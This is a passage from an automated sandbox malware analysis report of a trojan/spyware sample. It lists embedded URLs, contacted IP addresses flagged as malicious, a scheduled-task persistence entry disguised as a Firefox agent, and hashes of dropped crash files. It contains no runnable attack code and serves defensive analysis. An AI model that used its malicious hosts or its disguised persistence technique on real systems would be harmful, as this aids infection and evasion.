                                                              https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://api.ip.sb/ipB217.exe, 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, B217.exe, 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, B217.exe, 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000003.306713287.0000019EF1E45000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000006.00000003.306594986.0000019EF1E67000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307389782.0000019EF1E6A000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000003.306713287.0000019EF1E45000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000018.00000003.404140344.000001C13D37E000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404329534.000001C13D3A0000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404235759.000001C13D819000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404260188.000001C13D802000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404168368.000001C13D38F000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://activity.windows.comrsvchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000006.00000002.307249135.0000019EF1E13000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://%s.xboxlive.comsvchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		low
                                                                              https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000006.00000003.306604066.0000019EF1E49000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307358112.0000019EF1E4E000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://dynamic.tsvchost.exe, 00000006.00000002.307383226.0000019EF1E65000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://disneyplus.com/legal.svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307316944.0000019EF1E3A000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://activity.windows.comsvchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://help.disneyplus.com.svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		low
                                                                                                    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.306630585.0000019EF1E5E000.00000004.00000001.sdmpfalse
                                                                                                        		high

                                                                                                        Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        188.166.28.199
                                                                                                        		unknownNetherlands
                                                                                                        		14061DIGITALOCEAN-ASNUStrue
                                                                                                        74.201.28.62
                                                                                                        		unknownUnited States
                                                                                                        		35913DEDIPATH-LLCUStrue
                                                                                                        8.209.70.0
                                                                                                        		host-data-coin-11.comSingapore
                                                                                                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                        54.38.220.85
                                                                                                        		unicupload.topFrance
                                                                                                        		16276OVHFRfalse
                                                                                                        104.21.38.221
                                                                                                        		goo.suUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                        144.76.136.153
                                                                                                        		transfer.shGermany
                                                                                                        		24940HETZNER-ASDEfalse
                                                                                                        81.163.30.181
                                                                                                        		unknownRussian Federation
                                                                                                        		58303IR-RASANAPISHTAZIRfalse
                                                                                                        185.233.81.115
                                                                                                        		unknownRussian Federation
                                                                                                        		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                        185.7.214.171
                                                                                                        		unknownFrance
                                                                                                        		42652DELUNETDEtrue
                                                                                                        162.159.129.233
                                                                                                        		cdn.discordapp.comUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                        185.186.142.166
                                                                                                        		unknownRussian Federation
                                                                                                        		204490ASKONTELRUtrue

                                                                                                        Private

                                                                                                        IP
                                                                                                        192.168.2.1

                                                                                                        General Information

                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                        Analysis ID:553399
                                                                                                        Start date:14.01.2022
                                                                                                        Start time:20:21:27
                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                        Overall analysis duration:0h 15m 3s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:light
                                                                                                        Sample file name:ZA3cYU28Yl.exe
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                        Number of analysed new started processes analysed:44
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:2
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • HDC enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@47/28@87/12
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 90%
                                                                                                        HDC Information:
                                                                                                        • Successful, ratio: 25.7% (good quality ratio 18%)
                                                                                                        • Quality average: 52.7%
                                                                                                        • Quality standard deviation: 40.1%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 58%
                                                                                                        • Number of executed functions: 0
                                                                                                        • Number of non-executed functions: 0
                                                                                                        Cookbook Comments:
                                                                                                        • Adjust boot time
                                                                                                        • Enable AMSI
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        Warnings:
                                                                                                        Show All
                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                        • TCP Packets have been reduced to 100
                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 20.54.110.249, 104.208.16.94
                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, patmushta.info, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, iplogger.org, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, cdn.onenote.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                        • Execution Graph export aborted for target B217.exe, PID 6824 because there are no executed function
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        20:22:59Task SchedulerRun new task: Firefox Default Browser Agent F2854DB1E573CD13 path: C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                        20:23:14API Interceptor1x Sleep call for process: 9779.exe modified
                                                                                                        20:23:17API Interceptor7x Sleep call for process: svchost.exe modified
                                                                                                        20:23:24API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                        20:23:27API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        No context

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

                                                                                                        No context

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9460.exe_a795f71fcebe6b2e8adb61dbd3d258672ff4a7_b23f96db_139a0798\Report.wer
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.813617660062026
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:j4jgF/9bh+pmLiubWOQoJ7R3V6tpXIQcQec6tycEfcw3G+HbHg/8BRTf3o8Fa9iT:AgV9ZiuV8HQ0l7jIq/u7sGS274It7S
                                                                                                        MD5:A60CCEFB33BAB838A0842CE35C11B296
                                                                                                        SHA1:F9D2E8B7F00B0CCCC3628A83DD8BAB2CA02358B8
                                                                                                        SHA-256:985F759F3AC2C2682B9DA5D2DC3D5AEE1A5EA8595612DE30B49F43CD6D7AEE17
                                                                                                        SHA-512:12CFA5CA972022E82E47B97CFBBBD2D22BB9474C921FF2B0D4BCA5EE0D371D5E62F50A72A89F3F6F0192B47A9A42347AC44B3D6FAB4B64C3F7BEA616EDAD218A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.9.4.1.9.5.0.7.4.3.4.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.9.4.2.0.5.8.2.4.2.8.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.a.e.5.6.e.7.-.8.e.e.b.-.4.e.f.7.-.8.4.b.5.-.f.c.b.4.e.6.8.2.d.a.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.4.3.2.1.2.6.-.b.1.1.9.-.4.6.9.1.-.9.1.7.f.-.3.8.c.0.4.9.4.3.e.3.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.4.6.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.d.0.-.0.0.0.1.-.0.0.1.c.-.4.9.4.9.-.1.2.9.7.c.7.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.e.0.7.2.6.a.4.5.5.3.5.8.c.8.2.d.c.a.e.5.6.7.a.f.4.f.3.5.6.6.a.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.9.4.6.0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER61A4.tmp.dmp
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 14 streams, Sat Jan 15 04:23:16 2022, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):42152
                                                                                                        Entropy (8bit):2.001519542059326
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:AqyPvcFZtwUnOeh0kA4pNOuh5pJN+pnv162COtEjU:DN/2eOcBfnQvHujU
                                                                                                        MD5:B7A83B68D7813C5F6EE4A8C08D3CABE0
                                                                                                        SHA1:5FD3BA4981C8B276FB5CA3003693E54BB27A42C5
                                                                                                        SHA-256:AACA056F1CFB12EFB8F3CAEC53ECF0F509FA017B166726784FD3FECE706811FF
                                                                                                        SHA-512:D6E974EE11C64540E0B3DC8314873E69A0E8FE7B34509150E148121E65B5CD02A5A0E1017A0D06AD7B2A36B7D34DC4646CF0D62673CE24EB7A98E16B3E0859E4
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: MDMP....... .......4L.a....................................4...v(..........T.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T...........(L.a............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A11.tmp.WERInternalMetadata.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8392
                                                                                                        Entropy (8bit):3.700484672359636
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Rrl7r3GLNiyl6h6YFjSUYZ64gmfIRSvCpDlb89bO0sfs9Oam:RrlsNiY6h6YhSUY7gmfIRSpOnfsq
                                                                                                        MD5:0B7724FCFB03841A321D2C0F6F53A7A5
                                                                                                        SHA1:ABF661A74D8E477B637D1C03A72B31017669DCA9
                                                                                                        SHA-256:3EE72172DB782E753D2497C4F209B933F976A916BAAFB3DB80813E9F04D91C8F
                                                                                                        SHA-512:9138CDFA618C891CA853EF8FA2577C4D0E4AED35F258CD938D5FA18663CEEF739A2C6C275DF5AE91FF9ECF87767CCD5B3DFBEB8D1954AE556992A2EF0773C2E3
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.0.8.<./.P.i.d.>.......
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E58.tmp.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4685
                                                                                                        Entropy (8bit):4.475137069137135
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwSD8zsYNJgtWI9CsWSC8B/8fm8M4JB8qFz+q8vZ8WGP+Md:uITfGJFSNGJtKjGP+Md
                                                                                                        MD5:A33297D249A4C58DD86EC3E200BFF672
                                                                                                        SHA1:E75531810FA3D1DD508D5C3B25E56E0C4C79B0D8
                                                                                                        SHA-256:CCAB04CB11A5EAD4FC23C03D8D54C6507DC04465D061871E4EEB773D877A7952
                                                                                                        SHA-512:82C9907345C2D0C3DCA0EE5A0651CB9141838468012386F2D17E61D5D7E64D6F4F98B42181B44F4BCACC0E02693C73A58084404C1E558581423EF2F94407D26C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342893" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8697.tmp.csv
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):51890
                                                                                                        Entropy (8bit):3.0460149625790156
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:C/H4tWOnf0/Tb1/b+0l4Rydn5pbpF6Ftr6e2O9bB7d7cF:C/H4tWOnf0/Tb1/b+0l4Rydn51pF6FtK
                                                                                                        MD5:13395807C13FB08FB931641359AB795A
                                                                                                        SHA1:8AE0B8AE275A37A1C79B897A0DCF9A93AD4D502F
                                                                                                        SHA-256:0FC39CE42D88AABF23DDD4BC5FEF804DF4630C19540F1EF2D4CE5FF4F1300131
                                                                                                        SHA-512:2E0F41ADF15593D761D8754C5CE4C0B53BEEEAF7620FF39F37EF7B6A57FBF9DC8A08371405AD673FB7E9DE07849CA7807CDCA965BABA51986CE5D5104442CC7F
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B7A.tmp.txt
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13340
                                                                                                        Entropy (8bit):2.6960283297412
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:9GiZYWyxWpTYgYFWXGLH0YEZV5t2iFOxDAwlcZdgaoI7Ot2IfX3:9jZDnHJwckaoI7OtxfX3
                                                                                                        MD5:FDBF9CAA9D523FEEA1B571086287CD5E
                                                                                                        SHA1:4B8D9B60F59810A690638F7C31339B1C7F9581C4
                                                                                                        SHA-256:0573A32B634212500AD0FBD5423788CF7A3075F94B76045BF7861889639DB414
                                                                                                        SHA-512:9F32E558A86F8AC7C06E69A9A1701C1E66BE3B4BFA7AC5DDDF33A3DD9B993F8AF96028639FD70CF3146D27896867C9B9C4070D0AE68A693A1FF3DFA13C4A2D3D
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B217.exe.log
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):700
                                                                                                        Entropy (8bit):5.346524082657112
                                                                                                        Encrypted:false
